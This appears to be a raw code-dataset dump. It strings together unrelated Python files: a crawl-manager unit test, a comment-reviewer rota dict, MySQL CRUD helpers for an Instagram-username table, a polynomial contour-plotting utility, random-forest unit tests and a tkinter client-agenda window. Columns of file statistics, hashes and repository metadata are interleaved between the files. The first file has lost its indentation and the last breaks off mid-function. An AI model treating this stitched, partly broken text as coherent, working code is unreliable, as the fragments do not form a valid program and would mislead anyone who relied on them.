@patch("shub_workflow.crawl.WorkFlowManager.schedule_spider")
def test_schedule_spider_list_explicit_spider(self, mocked_super_schedule_spider):
class _ListTestManager(GeneratorCrawlManager):
name = "test"
default_max_jobs = 2
spider = "myspider"
def set_parameters_gen(self):
parameters_list = [
{"argA": "valA"},
{"argA": "valB", "spider": "myspidertwo"},
]
for args in parameters_list:
yield args
with script_args([]):
manager = _ListTestManager()
mocked_super_schedule_spider.side_effect = ["999/1/1", "999/1/2"]
manager._WorkFlowManager__on_start()
# first loop: schedule spider with first set of arguments
result = manager.workflow_loop()
self.assertTrue(result)
self.assertEqual(mocked_super_schedule_spider.call_count, 2)
mocked_super_schedule_spider.assert_any_call("myspider", units=None, argA="valA", job_settings={})
mocked_super_schedule_spider.assert_any_call("myspidertwo", units=None, argA="valB", job_settings={})
@patch("shub_workflow.crawl.WorkFlowManager.schedule_spider")
def test_schedule_spider_list_scrapy_cloud_params(self, mocked_super_schedule_spider):
class _ListTestManager(GeneratorCrawlManager):
name = "test"
default_max_jobs = 2
spider = "myspider"
def set_parameters_gen(self):
parameters_list = [
{
"argA": "valA",
"units": 2,
"tags": ["CHECKED"],
"project_id": 999,
"job_settings": {"CONCURRENT_REQUESTS": 2},
},
]
for args in parameters_list:
yield args
with script_args([]):
manager = _ListTestManager()
mocked_super_schedule_spider.side_effect = ["999/1/1", "999/1/2"]
manager._WorkFlowManager__on_start()
# first loop: schedule spider with first set of arguments
result = manager.workflow_loop()
self.assertTrue(result)
self.assertEqual(mocked_super_schedule_spider.call_count, 1)
mocked_super_schedule_spider.assert_any_call(
"myspider", units=2, argA="valA", job_settings={"CONCURRENT_REQUESTS": 2}, project_id=999, tags=["CHECKED"]
)
| 37.954861
| 119
| 0.664349
| 1,240
| 10,931
| 5.56371
| 0.107258
| 0.14205
| 0.132193
| 0.173938
| 0.84563
| 0.836933
| 0.831425
| 0.81809
| 0.81809
| 0.794318
| 0
| 0.017049
| 0.238039
| 10,931
| 287
| 120
| 38.087108
| 0.811262
| 0.084439
| 0
| 0.721649
| 0
| 0
| 0.106549
| 0.040857
| 0
| 0
| 0
| 0
| 0.252577
| 1
| 0.061856
| false
| 0
| 0.025773
| 0
| 0.154639
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f7eaf4936a1f29b84a16462835a7c8320552cf21
| 2,092
|
py
|
Python
|
messages/comments_reviewer.py
|
qxf2/daily-messages
|
0e93033df8d519873094928eba2a9d0151f1b459
|
[
"MIT"
] | null | null | null |
messages/comments_reviewer.py
|
qxf2/daily-messages
|
0e93033df8d519873094928eba2a9d0151f1b459
|
[
"MIT"
] | 5
|
2020-09-15T10:30:37.000Z
|
2021-01-21T18:42:04.000Z
|
messages/comments_reviewer.py
|
qxf2/daily-messages
|
0e93033df8d519873094928eba2a9d0151f1b459
|
[
"MIT"
] | 2
|
2020-08-27T10:24:38.000Z
|
2021-01-27T13:00:06.000Z
|
messages = { '2021-03-18':"<b>@all</b>, Comment reviewers for next week are- Rahul and Rohan J." ,
'2021-03-26':"<b>@all</b>, Comment reviewers for next week are- Akkul and Rohan D.",
'2021-04-01':"<b>@all</b>, Comment reviewers for next week are- Annapoorani and Shivahari.",
'2021-04-08':"<b>@all</b>, Comment reviewers for next week are- Rohan J. and Drishya.",
'2021-04-15':"<b>@all</b>, Comment reviewers for next week are- Rohini and Raghava.",
'2021-04-22':"<b>@all</b>, Comment reviewers for next week are- Avinash and Rahul.",
'2021-04-29':"<b>@all</b>, Comment reviewers for next week are- Mohan and Nilaya.",
'2021-05-06':"<b>@all</b>, Comment reviewers for next week are- Smitha and Preedhi.",
'2021-05-13':"<b>@all</b>, Comment reviewers for next week are- Rohan D. and Drishya.",
'2021-05-20':"<b>@all</b>, Comment reviewers for next week are- Rohini and Sravanti.",
'2021-05-27':"<b>@all</b>, Comment reviewers for next week are- Indira and Raghava.",
'2021-06-03':"<b>@all</b>, Comment reviewers for next week are- Annapoorani and Rohan J.",
'2021-06-10':"<b>@all</b>, Comment reviewers for next week are- Shivahari and Akkul.",
'2021-06-17':"<b>@all</b>, Comment reviewers for next week are- Avinash and Nilaya.",
'2021-06-24':"<b>@all</b>, Comment reviewers for next week are- Smitha and Rohan J.",
'2021-07-01':"<b>@all</b>, Comment reviewers for next week are- Rohini and Preedhi.",
'2021-07-08':"<b>@all</b>, Comment reviewers for next week are- Rohan D. and Mohan.",
'2021-07-15':"<b>@all</b>, Comment reviewers for next week are- Drishya and Raghava.",
'2021-07-22':"<b>@all</b>, Comment reviewers for next week are- Shivahari and Rahul.",
'2021-07-29':"<b>@all</b>, Comment reviewers for next week are- Indira and Sravanti.",
'2021-08-05':"<b>@all</b>, Comment reviewers for next week are- Annapoorani and Akkul.",
}
| 95.090909
| 104
| 0.600382
| 323
| 2,092
| 3.888545
| 0.142415
| 0.066879
| 0.083599
| 0.200637
| 0.738057
| 0.738057
| 0.738057
| 0.738057
| 0.738057
| 0.682325
| 0
| 0.103768
| 0.226099
| 2,092
| 22
| 105
| 95.090909
| 0.67202
| 0
| 0
| 0
| 0
| 0
| 0.80172
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f7f0b08c222caa44dd042bd783f69e8d7aaef915
| 1,870
|
py
|
Python
|
app/models/Username.py
|
haryobagus/haryo_ig
|
1ad160b422d2c6d5b9b3016e312eb77a576ff9b1
|
[
"MIT"
] | null | null | null |
app/models/Username.py
|
haryobagus/haryo_ig
|
1ad160b422d2c6d5b9b3016e312eb77a576ff9b1
|
[
"MIT"
] | null | null | null |
app/models/Username.py
|
haryobagus/haryo_ig
|
1ad160b422d2c6d5b9b3016e312eb77a576ff9b1
|
[
"MIT"
] | null | null | null |
from app.config import db
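# Minimal CRUD helpers for the ig_usernames table, using the shared db connection from app.config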
def get_all():
try:
conn = db.conn()
with conn.cursor() as cursor:
sql = '''SELECT * FROM ig_usernames ORDER BY id DESC'''
cursor.execute(sql)
conn.commit()
conn.close()
return cursor.fetchall()
except Exception as e:
print("Exeception occured:{}".format(e))
return False
def get_one(id):
try:
conn = db.conn()
with conn.cursor() as cursor:
sql = "SELECT * FROM ig_usernames WHERE id=%s"
cursor.execute(sql, (id,))
conn.commit()
conn.close()
return cursor.fetchone()
except Exception as e:
print("Exeception occured:{}".format(e))
return False
def store(data):
try:
conn = db.conn()
with conn.cursor() as cursor:
sql = '''INSERT INTO ig_usernames (`username`) values (%s)'''
cursor.execute(sql, (data['username'],))
conn.commit()
conn.close()
return True
except Exception as e:
print("Exeception occured:{}".format(e))
return False
def update(data, id):
print(data)
try:
conn = db.conn()
with conn.cursor() as cursor:
sql = '''UPDATE ig_usernames SET `username`=%s WHERE id=%s'''
cursor.execute(sql, (data['username'], id))
conn.commit()
conn.close()
return True
except Exception as e:
print("Exeception occured:{}".format(e))
return False
def delete(id):
try:
conn = db.conn()
with conn.cursor() as cursor:
sql = "DELETE FROM ig_usernames WHERE id=%s"
cursor.execute(sql, (id,))
conn.commit()
conn.close()
return True
except Exception as e:
print("Exeception occured:{}".format(e))
return False
| 27.910448
| 73
| 0.542781
| 221
| 1,870
| 4.561086
| 0.217195
| 0.034722
| 0.044643
| 0.064484
| 0.822421
| 0.822421
| 0.72123
| 0.72123
| 0.72123
| 0.72123
| 0
| 0
| 0.328877
| 1,870
| 67
| 74
| 27.910448
| 0.803187
| 0
| 0
| 0.725806
| 0
| 0
| 0.179583
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.080645
| false
| 0
| 0.016129
| 0
| 0.258065
| 0.096774
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7913179f368e27dbaa2d116839f327fa1b424800
| 3,803
|
py
|
Python
|
mavi/jax/util/plot.py
|
HiroshiKERA/monomial-agnostic-vanishing-ideal
|
ddfb53ded0ee87f129ec029603e8245565f653d2
|
[
"MIT"
] | null | null | null |
mavi/jax/util/plot.py
|
HiroshiKERA/monomial-agnostic-vanishing-ideal
|
ddfb53ded0ee87f129ec029603e8245565f653d2
|
[
"MIT"
] | null | null | null |
mavi/jax/util/plot.py
|
HiroshiKERA/monomial-agnostic-vanishing-ideal
|
ddfb53ded0ee87f129ec029603e8245565f653d2
|
[
"MIT"
] | null | null | null |
import jax.numpy as np
import matplotlib.pyplot as plt
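# Helpers to contour-plot the zero level sets of the (non)vanishing basis polynomials of `vi` over the sample points X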
def plot(vi, X,
target='vanishing',
n=1000, scale=1.5, x_max=1.0, y_max=1.0,
z_func=lambda x_, y_: 0.0,
show=False, splitshow=False):
nvars = X.shape[-1]
if nvars == 2:
_plot2d(vi, X, target=target,
n=n, scale=scale, x_max=x_max, y_max=y_max,
show=show, splitshow=splitshow)
elif nvars == 3:
_plot3d(vi, X, z_func, target=target,
n=n, scale=scale, x_max=x_max, y_max=y_max,
show=show, splitshow=splitshow)
else:
print(f'Cannot plot {nvars}-variate polynomials')
def _plot2d(vi, X, target='vanishing', n=1000, scale=1.5, x_max=1.0, y_max=1.0, show=False, splitshow=False):
## set plot range
m = np.mean(X, axis=0)
x_max = y_max = np.max(np.abs(X))
# x = np.arange(-scale*x_max, scale*x_max, resolution)
# y = np.arange(-scale*y_max, scale*y_max, resolution)
x = np.linspace(-scale*x_max, scale*x_max, 50)
y = np.linspace(-scale*y_max, scale*y_max, 50)
Z1, Z2 = np.meshgrid(x, y)
## set plot setting
npolys = 0
if target == 'vanishing':
# npolys = sum([Gt.shape[-1] for Gt in vi.basis.vanishings()])
npolys = sum([Bt.n_vanishings() for Bt in vi.basis])
# npolys = sum([len(Gt) for Gt in vi.basis.vanishings()])
elif target == 'nonvanishing':
npolys = sum([Bt.n_nonvanishings() for Bt in vi.basis])
colors = plt.cm.Dark2(np.linspace(0,1,8))
linestyles = ['solid','dashed','dashdot', 'dotted']
nfigs = min(npolys, n)
for i in range(nfigs):
f = lambda x_, y_: vi.evaluate(np.array([[x_,y_]]), target=target)[0,i]
f = np.vectorize(f)
plt.contour(Z1,Z2,f(Z1, Z2), levels=[0], colors=[colors[i%len(colors)]], linewidths=[1.], linestyles=[linestyles[i%4]])
if splitshow:
plt.plot(X[:,0], X[:,1], 'o', mfc='none', alpha=0.8)
plt.gca().set_aspect('equal', adjustable='box')
plt.show()
if not splitshow:
plt.plot(X[:,0], X[:,1], 'o', mfc='none', alpha=0.8)
plt.gca().set_aspect('equal', adjustable='box')
# plt.savefig('graph_Z.pdf')
if not splitshow and show:
plt.show()
def _plot3d(vi, X, z_func, target='vanishing', n=1000, scale=1.5, x_max=1.0, y_max=1.0, show=False, splitshow=False):
## set plot range
m = np.mean(X, axis=0)
x_max = y_max = np.max(np.abs(X))
x = np.linspace(-scale*x_max, scale*x_max, 50)
y = np.linspace(-scale*y_max, scale*y_max, 50)
Z1, Z2 = np.meshgrid(x, y)
## set plot setting
npolys = 0
if target == 'vanishing':
npolys = sum([np.asarray(Gt).shape[-1] for Gt in vi.basis.vanishings()])
# npolys = sum([len(Gt) for Gt in vi.basis.vanishings()])
elif target == 'nonvanishing':
npolys = sum([np.asarray(Ft).shape[-1] for Ft in vi.basis.nonvanishings()])
else:
print('unknown target: %s' % target)
colors = plt.cm.Dark2(np.linspace(0,1,8))
linestyles = ['solid','dashed','dashdot', 'dotted']
nfigs = min(npolys, n)
for i in range(nfigs):
f = lambda x_, y_: vi.evaluate(np.array([[x_,y_, z_func(x_,y_)]]), target=target)[0,i]
f = np.vectorize(f)
plt.contour(Z1,Z2,f(Z1, Z2), levels=[0], colors=[colors[i%len(colors)]], linewidths=[1.], linestyles=[linestyles[i%4]])
if splitshow:
plt.plot(X[:,0], X[:,1], 'o', mfc='none', alpha=0.8)
plt.gca().set_aspect('equal', adjustable='box')
plt.show()
if not splitshow:
plt.plot(X[:,0], X[:,1], 'o', mfc='none', alpha=0.8)
plt.gca().set_aspect('equal', adjustable='box')
# plt.savefig('graph_Z.pdf')
if not splitshow and show:
plt.show()
| 35.877358
| 127
| 0.576913
| 603
| 3,803
| 3.542289
| 0.172471
| 0.02809
| 0.033708
| 0.014981
| 0.854401
| 0.830056
| 0.800094
| 0.800094
| 0.800094
| 0.800094
| 0
| 0.033875
| 0.239285
| 3,803
| 105
| 128
| 36.219048
| 0.704459
| 0.108598
| 0
| 0.702703
| 0
| 0
| 0.067003
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040541
| false
| 0
| 0.027027
| 0
| 0.067568
| 0.027027
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
792adb7f071cd1c0bc5787f281800053775c5ede
| 15,297
|
py
|
Python
|
tests/test_core.py
|
pyensemble/wildwood
|
b261cbd7d0b425b50647f719ab99c1d89f477d5c
|
[
"BSD-3-Clause"
] | 22
|
2021-06-24T11:30:03.000Z
|
2022-03-09T00:59:30.000Z
|
tests/test_core.py
|
pyensemble/wildwood
|
b261cbd7d0b425b50647f719ab99c1d89f477d5c
|
[
"BSD-3-Clause"
] | 65
|
2021-03-13T17:50:03.000Z
|
2022-02-22T16:50:02.000Z
|
tests/test_core.py
|
pyensemble/wildwood
|
b261cbd7d0b425b50647f719ab99c1d89f477d5c
|
[
"BSD-3-Clause"
] | 3
|
2021-03-04T18:44:10.000Z
|
2022-01-26T17:28:35.000Z
|
# Authors: Stephane Gaiffas <stephane.gaiffas@gmail.com>
# License: BSD 3 clause
"""
This module performs unittests on some core computations involved in WildWood
"""
import pytest
import numpy as np
from wildwood import ForestClassifier, ForestRegressor
from wildwood.datasets import load_adult, load_boston, load_car
from wildwood._split import is_bin_in_partition
@pytest.mark.parametrize(
"bin_partition",
[
np.array([3], dtype=np.uint8),
np.array([3, 4], dtype=np.uint8),
np.array([3, 4, 8], dtype=np.uint8),
],
)
@pytest.mark.parametrize(
"bin_", range(13),
)
def test_is_bin_in_partition(bin_partition, bin_):
in_partition = bin_ in bin_partition
assert is_bin_in_partition(bin_, bin_partition) == in_partition
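# Illustrative pure-Python reference for the membership check exercised above.
# This is only a sketch of the expected behaviour, not the actual (jitted)
# wildwood implementation:
def _is_bin_in_partition_reference(bin_, bin_partition):
    # A bin belongs to a partition when its index appears in the partition array
    return bool(np.any(bin_partition == bin_))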
def check_nodes(nodes, bin_partitions, aggregation):
node_count = nodes.size
assert node_count > 0
for node_id, node in enumerate(nodes):
# Check that node_id is indeed its index in the array
assert node_id == node["node_id"]
# Check that nodes contain both training and validation samples
assert node["n_samples_train"] >= 1
assert node["w_samples_train"] > 0.0
if aggregation:
assert node["n_samples_valid"] >= 1
assert node["w_samples_valid"] > 0.0
# Check start_train, end_train, start_valid and end_valid
start_train = node["start_train"]
end_train = node["end_train"]
start_valid = node["start_valid"]
end_valid = node["end_valid"]
assert start_train < end_train
if aggregation:
assert start_valid < end_valid
parent = node["parent"]
if node_id != 0:
# Check that node_id of the node is larger than the one of its parent
assert node_id > nodes[parent]["node_id"]
# Check that start_train, end_train, start_valid and end_valid are
# included in those of the parent
assert start_train >= nodes[parent]["start_train"]
assert end_train <= nodes[parent]["end_train"]
if aggregation:
assert start_valid >= nodes[parent]["start_valid"]
assert end_valid <= nodes[parent]["end_valid"]
            # Check that the depth of a child is one more than its parent's depth
assert node["depth"] == nodes[parent]["depth"] + 1
# TODO: Check that leaves have no child
# Check that categorical splits have non-empty bin_partition
if node["is_split_categorical"]:
bin_partition_start = node["bin_partition_start"]
bin_partition_end = node["bin_partition_end"]
assert bin_partition_start < bin_partition_end
bin_partition = bin_partitions[bin_partition_start:bin_partition_end]
assert bin_partition.size >= 1
if_leaf = node["is_leaf"]
# Check that no non-leaf node is pure
if not if_leaf:
assert node["impurity"] > 0.0
# Check that a pure node is a leaf
if node["impurity"] == 0:
assert if_leaf
if not if_leaf:
left_child = node["left_child"]
right_child = node["right_child"]
            # Check that child and parent information matches
assert node_id == nodes[left_child]["parent"]
assert node_id == nodes[right_child]["parent"]
            # TODO: check that left children are indeed left children (we don't use
            # these for now...)
# assert nodes[left_child]["is_left"] == True
# assert not nodes[right_child]["is_left"]
@pytest.mark.parametrize("n_estimators", [2])
@pytest.mark.parametrize("aggregation, dirichlet", [(False, 0.0), (True, 1e-7)])
@pytest.mark.parametrize("class_weight", [None, "balanced"])
@pytest.mark.parametrize("n_jobs", [1, -1])
@pytest.mark.parametrize("max_features", [None, "auto"])
@pytest.mark.parametrize("random_state", [42])
@pytest.mark.parametrize("step", [1.0])
@pytest.mark.parametrize("multiclass", ["multinomial"])
@pytest.mark.parametrize("cat_split_strategy", ["binary", "all", "random"])
@pytest.mark.parametrize(
"one_hot_encode, use_categoricals", [(False, False), (False, True), (True, False)]
)
@pytest.mark.parametrize("criterion", ("gini", "entropy"))
def test_nodes_on_adult(
n_estimators,
aggregation,
class_weight,
n_jobs,
max_features,
random_state,
dirichlet,
step,
multiclass,
cat_split_strategy,
one_hot_encode,
use_categoricals,
criterion,
):
dataset = load_adult()
dataset.test_size = 1.0 / 5
dataset.standardize = False
dataset.one_hot_encode = one_hot_encode
X_train, X_test, y_train, y_test = dataset.extract(random_state=random_state)
if use_categoricals:
categorical_features = dataset.categorical_features_
else:
categorical_features = None
clf = ForestClassifier(
n_estimators=n_estimators,
n_jobs=n_jobs,
multiclass=multiclass,
cat_split_strategy=cat_split_strategy,
aggregation=aggregation,
criterion=criterion,
max_features=max_features,
class_weight=class_weight,
categorical_features=categorical_features,
random_state=random_state,
dirichlet=dirichlet,
step=step,
)
clf.fit(X_train, y_train)
for tree in clf.trees:
node_count = tree._tree_classifier.node_count
nodes = tree._tree_classifier.nodes[:node_count]
bin_partitions = tree._tree_classifier.bin_partitions
assert tree._tree_classifier.nodes.size >= node_count
check_nodes(nodes, bin_partitions, aggregation)
@pytest.mark.parametrize("n_estimators", [2])
@pytest.mark.parametrize("aggregation, dirichlet", [(False, 0.0), (True, 1e-7)])
@pytest.mark.parametrize("class_weight", [None, "balanced"])
@pytest.mark.parametrize("n_jobs", [1, -1])
@pytest.mark.parametrize("max_features", [None, "auto"])
@pytest.mark.parametrize("random_state", [42])
@pytest.mark.parametrize("step", [1.0])
@pytest.mark.parametrize("multiclass", ["multinomial", "ovr"])
@pytest.mark.parametrize("cat_split_strategy", ["binary", "all", "random"])
@pytest.mark.parametrize(
"one_hot_encode, use_categoricals", [(False, False), (False, True), (True, False)]
)
@pytest.mark.parametrize("criterion", ("gini", "entropy"))
def test_nodes_on_car(
n_estimators,
aggregation,
class_weight,
n_jobs,
max_features,
random_state,
dirichlet,
step,
multiclass,
cat_split_strategy,
one_hot_encode,
use_categoricals,
criterion,
):
dataset = load_car()
dataset.test_size = 1.0 / 5
dataset.standardize = False
dataset.one_hot_encode = one_hot_encode
X_train, X_test, y_train, y_test = dataset.extract(random_state=random_state)
if use_categoricals:
categorical_features = dataset.categorical_features_
else:
categorical_features = None
clf = ForestClassifier(
n_estimators=n_estimators,
n_jobs=n_jobs,
multiclass=multiclass,
cat_split_strategy=cat_split_strategy,
aggregation=aggregation,
criterion=criterion,
max_features=max_features,
class_weight=class_weight,
categorical_features=categorical_features,
random_state=random_state,
dirichlet=dirichlet,
step=step,
)
clf.fit(X_train, y_train)
for tree in clf.trees:
node_count = tree._tree_classifier.node_count
nodes = tree._tree_classifier.nodes[:node_count]
bin_partitions = tree._tree_classifier.bin_partitions
assert tree._tree_classifier.nodes.size >= node_count
check_nodes(nodes, bin_partitions, aggregation)
@pytest.mark.parametrize("n_estimators", [2])
@pytest.mark.parametrize("aggregation, dirichlet", [(False, 0.0), (True, 1e-7)])
@pytest.mark.parametrize("class_weight", [None, "balanced"])
@pytest.mark.parametrize("n_jobs", [1, -1])
@pytest.mark.parametrize("max_features", [None, "auto"])
@pytest.mark.parametrize("random_state", [42])
@pytest.mark.parametrize("step", [1.0])
@pytest.mark.parametrize("multiclass", ["multinomial"])
@pytest.mark.parametrize("cat_split_strategy", ["binary", "all", "random"])
@pytest.mark.parametrize(
"one_hot_encode, use_categoricals", [(False, False), (False, True), (True, False)]
)
@pytest.mark.parametrize("criterion", ("gini", "entropy"))
def test_nodes_on_churn(
n_estimators,
aggregation,
class_weight,
n_jobs,
max_features,
random_state,
dirichlet,
step,
multiclass,
cat_split_strategy,
one_hot_encode,
use_categoricals,
criterion,
):
dataset = load_car()
dataset.test_size = 1.0 / 5
dataset.standardize = False
dataset.one_hot_encode = one_hot_encode
X_train, X_test, y_train, y_test = dataset.extract(random_state=random_state)
if use_categoricals:
categorical_features = dataset.categorical_features_
else:
categorical_features = None
clf = ForestClassifier(
n_estimators=n_estimators,
n_jobs=n_jobs,
multiclass=multiclass,
cat_split_strategy=cat_split_strategy,
aggregation=aggregation,
criterion=criterion,
max_features=max_features,
class_weight=class_weight,
categorical_features=categorical_features,
random_state=random_state,
dirichlet=dirichlet,
step=step,
)
clf.fit(X_train, y_train)
for tree in clf.trees:
node_count = tree._tree_classifier.node_count
nodes = tree._tree_classifier.nodes[:node_count]
bin_partitions = tree._tree_classifier.bin_partitions
assert tree._tree_classifier.nodes.size >= node_count
check_nodes(nodes, bin_partitions, aggregation)
@pytest.mark.parametrize("n_estimators", [2])
@pytest.mark.parametrize("aggregation", [False, True])
@pytest.mark.parametrize("n_jobs", [1, -1])
@pytest.mark.parametrize("max_features", [None, "auto"])
@pytest.mark.parametrize("random_state", [42])
@pytest.mark.parametrize("step", [1.0])
@pytest.mark.parametrize(
"one_hot_encode, use_categoricals", [(False, False), (False, True), (True, False)]
)
def test_nodes_on_boston(
n_estimators,
aggregation,
n_jobs,
max_features,
random_state,
step,
one_hot_encode,
use_categoricals,
):
dataset = load_boston()
dataset.test_size = 1.0 / 5
dataset.standardize = False
dataset.one_hot_encode = one_hot_encode
X_train, X_test, y_train, y_test = dataset.extract(random_state=random_state)
if use_categoricals:
categorical_features = dataset.categorical_features_
else:
categorical_features = None
clf = ForestRegressor(
n_estimators=n_estimators,
n_jobs=n_jobs,
aggregation=aggregation,
max_features=max_features,
categorical_features=categorical_features,
random_state=random_state,
step=step,
)
clf.fit(X_train, y_train)
for tree in clf.trees:
node_count = tree._tree_regressor.node_count
nodes = tree._tree_regressor.nodes[:node_count]
bin_partitions = tree._tree_regressor.bin_partitions
assert tree._tree_regressor.nodes.size >= node_count
check_nodes(nodes, bin_partitions, aggregation)
@pytest.mark.parametrize("aggregation", [False, True])
@pytest.mark.parametrize("max_features", [None, "auto"])
@pytest.mark.parametrize("random_state", [42])
@pytest.mark.parametrize(
"one_hot_encode, use_categoricals", [(False, False), (False, True), (True, False)]
)
@pytest.mark.parametrize(
"min_samples_split, min_samples_leaf", [(2, 1), (13, 7), (3, 5)]
)
@pytest.mark.parametrize("criterion", ("gini", "entropy"))
def test_min_samples_split_min_samples_leaf_on_adult(
aggregation,
max_features,
random_state,
one_hot_encode,
use_categoricals,
min_samples_split,
min_samples_leaf,
criterion,
):
dataset = load_adult()
dataset.test_size = 1.0 / 5
dataset.standardize = False
dataset.one_hot_encode = one_hot_encode
n_estimators = 3
n_jobs = -1
class_weight = "balanced"
multiclass = "multinomial"
step = 1.0
X_train, X_test, y_train, y_test = dataset.extract(random_state=random_state)
if use_categoricals:
categorical_features = dataset.categorical_features_
else:
categorical_features = None
clf = ForestClassifier(
n_estimators=n_estimators,
n_jobs=n_jobs,
multiclass=multiclass,
aggregation=aggregation,
max_features=max_features,
criterion=criterion,
min_samples_split=min_samples_split,
min_samples_leaf=min_samples_leaf,
class_weight=class_weight,
categorical_features=categorical_features,
random_state=random_state,
step=step,
)
clf.fit(X_train, y_train)
min_samples = min(min_samples_split, min_samples_leaf)
for tree in clf.trees:
node_count = tree._tree_classifier.node_count
nodes = tree._tree_classifier.nodes[:node_count]
for node_id, node in enumerate(nodes):
# Check that nodes respect the min_samples_split and
# min_samples_leaf constraints
assert node["n_samples_train"] >= min_samples
if aggregation:
assert node["n_samples_valid"] >= min_samples
@pytest.mark.parametrize("aggregation", [False, True])
@pytest.mark.parametrize("max_features", [None, "auto"])
@pytest.mark.parametrize("random_state", [42])
@pytest.mark.parametrize(
"one_hot_encode, use_categoricals", [(False, False), (False, True), (True, False)]
)
@pytest.mark.parametrize(
"min_samples_split, min_samples_leaf", [(2, 1), (13, 7), (3, 5)]
)
def test_min_samples_split_min_samples_leaf_on_boston(
aggregation,
max_features,
random_state,
one_hot_encode,
use_categoricals,
min_samples_split,
min_samples_leaf,
):
dataset = load_boston()
dataset.test_size = 1.0 / 5
dataset.standardize = False
dataset.one_hot_encode = one_hot_encode
n_estimators = 3
n_jobs = -1
step = 1.0
X_train, X_test, y_train, y_test = dataset.extract(random_state=random_state)
if use_categoricals:
categorical_features = dataset.categorical_features_
else:
categorical_features = None
clf = ForestRegressor(
n_estimators=n_estimators,
n_jobs=n_jobs,
aggregation=aggregation,
max_features=max_features,
min_samples_split=min_samples_split,
min_samples_leaf=min_samples_leaf,
categorical_features=categorical_features,
random_state=random_state,
step=step,
)
clf.fit(X_train, y_train)
min_samples = min(min_samples_split, min_samples_leaf)
for tree in clf.trees:
node_count = tree._tree_regressor.node_count
nodes = tree._tree_regressor.nodes[:node_count]
for node_id, node in enumerate(nodes):
# Check that nodes respect the min_samples_split and
# min_samples_leaf constraints
assert node["n_samples_train"] >= min_samples
if aggregation:
assert node["n_samples_valid"] >= min_samples
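# Minimal sketch for running this module directly (assumes pytest is installed;
# normally these tests are run through the project's regular test runner):
if __name__ == "__main__":
    import sys
    sys.exit(pytest.main(["-q", __file__]))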
| 34.221477
| 86
| 0.678499
| 1,900
| 15,297
| 5.160526
| 0.085789
| 0.054054
| 0.113514
| 0.018358
| 0.826007
| 0.807343
| 0.782356
| 0.759204
| 0.755023
| 0.734523
| 0
| 0.009164
| 0.215336
| 15,297
| 446
| 87
| 34.298206
| 0.807715
| 0.071517
| 0
| 0.797927
| 0
| 0
| 0.091717
| 0
| 0
| 0
| 0
| 0.002242
| 0.07513
| 1
| 0.020725
| false
| 0
| 0.012953
| 0
| 0.033679
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| 7935711f077546265b20c05740a0ab8495ab1d51
| 14,861
| py
| Python
| janeladetalhadaagenda.py
| vinerodrigues/sistema-loja_main
| 15024e5f42ae446935986fbbf27dec470741e5d8
| ["MIT"] | null | null | null
| janeladetalhadaagenda.py
| vinerodrigues/sistema-loja_main
| 15024e5f42ae446935986fbbf27dec470741e5d8
| ["MIT"] | null | null | null
| janeladetalhadaagenda.py
| vinerodrigues/sistema-loja_main
| 15024e5f42ae446935986fbbf27dec470741e5d8
| ["MIT"] | null | null | null
|
from tkinter import*
import tkinter as tk
from functools import partial
from datetime import datetime
import time
import main_menu
import dbclientes
import cv2
class abrir_janela_detalhada(object):
def __init__(self, i):
self.carregar_scrollbars(i)
self.listar_financas(i)
def listar_financas(self, i):
def mostrar_foto(nome):
diretorio = "C:/sistema_loja-main/imagens_clientes/"+nome+".png"
imagem = cv2.imread(diretorio)
cv2.imshow("Original", imagem)
cv2.waitKey(0)
pass
x = dbclientes.clientes.keys() #¬ | ! £ ¢ §
#print("Lista: ",x)
for k in x:
#print('Nome:',k)
aux = ""
y = dbclientes.clientes[k.decode()].decode()
#print('Valor: ',y)
#self.data_aux = ''
#self.hora_aux = ''
nome = k.decode()
aux = ''
telefone = ''
data_de_nascimento=''
email=''
endereco = ''
self.data_aux=''
self.hora_aux=''
comentarios =''
for i in y:
##print("Correndo o data base - ",i)
if i == '¹' and telefone == '':
if aux == '':
telefone = ('021')
else:
telefone = aux
#self.entry_tel.delete(0,END)
#self.entry_tel.insert(END, telefone)
##print("Telefone: ",telefone)
aux = ''
elif i == '¹' and data_de_nascimento == '':
if aux == '':
data_de_nascimento = ('00/00/0000')
elif aux == ' ':
data_de_nascimento = ('00/00/0000')
elif aux == ' ':
data_de_nascimento = ('00/00/0000')
elif aux == ' ':
data_de_nascimento = ('00/00/0000')
elif aux == ' ':
data_de_nascimento = ('00/00/0000')
else:
data_de_nascimento = aux
#self.entry_nascimento.delete(0,END)
#self.entry_nascimento.insert(END, data_de_nascimento)
##print("data_de_nascimento: ", data_de_nascimento)
#data_de_nascimento = aux
##print(aux)
aux = ''
elif i == '¹' and email == '':
if aux == '':
email = "Vazio"
elif aux == ' ':
email = "Vazio"
elif email == ' ':
email = "Vazio"
elif email == " ":
email="Vazio"
else:
email = aux
#self.entry_email.delete(0,END)
#self.entry_email.insert(END, email)
aux = ''
